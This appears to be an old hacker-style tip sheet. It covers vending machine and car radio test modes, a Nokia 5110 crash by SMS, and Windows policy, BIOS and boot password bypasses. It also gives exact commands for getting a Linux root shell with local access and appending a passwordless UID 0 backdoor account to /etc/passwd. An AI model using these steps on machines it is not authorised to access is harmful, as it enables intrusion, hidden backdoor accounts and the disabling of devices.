Quick Tricks
Now Just a few quick tips
(I pulled all the other stuff, its for your own good :œ )
Stuff Covered - Linux, Mobiles, Windows, BIOS, Vending Machines, Car Radios ?
Cadbuary's Chocolate Vending Machines
Put it into a status check.
Press 112, others in the 110 to 120 range
Car Radio's (with Dash Display)
Put it into a test mode.
hold down the two buttons on the dash display
for 2 or 3 seconds (usually used to set the clock)
System: Nokia 5110
Crash it
Send an SMS message full of 160 full stops to the phone
It will now beep and flash for 30 sec's or else just turn itself off
System: Linux (with lilo installed and local access)
Gives a root shell / root account
reboot your machine on the lilo: prompt type in
what-linux-is-called-in-/etc/lilo.conf init=/bin/bash rw
(i.e. linux init=/bin/bash rw )
linux will now start to boot and stop after a few error message
you now have a root shell (you will have very few commands) so
type in the following
cat >> /etc/passwd
manicx::0:0:new root account:/root:/bin/bash
(hit crtl+d to get out of cat)
sync (just to bring your files up to date)
reboot and login with your new root account called manicx (no password)
System: Linux (with local access)
Gives a root shell / root account
Boot with the rescue.img available on most linux distro cd's
voila one root shell you will probably have to mount your linux
partition (hda5 is the partition might be hda2 > hda7)
mkdir /linux
mount /dev/hda5 /linux
cat >> /linux/etc/passwd
manicx::0:0:new root account:/root:/bin/bash
(hit crtl+d to get out of cat)
sync (just to bring your files up to date)
reboot and login with your new root account called manicx (no password)
System: Windows
Remove All policy restrictions
Open regedit
Scroll down to :
Anything with a value of "1" is turned ON so double click on it
and change the value to "0" to turn it OFF
(Or if you cant be arsed just delete them, Its best to
note changes and change them back when your finished)
When your finished just exit you should now have access to the
all the restricted commands (run/dosprompt/control_panel/etc)
(Win98- You will probably have to reboot before the changes take effect)
System: Windows 95
Close down the start menu :œ
Double click the [Start] button, so its got a black dotted line
on it (this means its got focus) hit alt and - (minus key) at the
same time, voila you can now move or close the startmenu
System: Windows
Gets rid of BIOS password (and resets CMOS settings)
Or Pull out the cmos battery for 5-10 mins (you need to know the setup)
System: Windows
Get past any password protection before boot-up
Try booting from a floppy or holding down the shift key during startup
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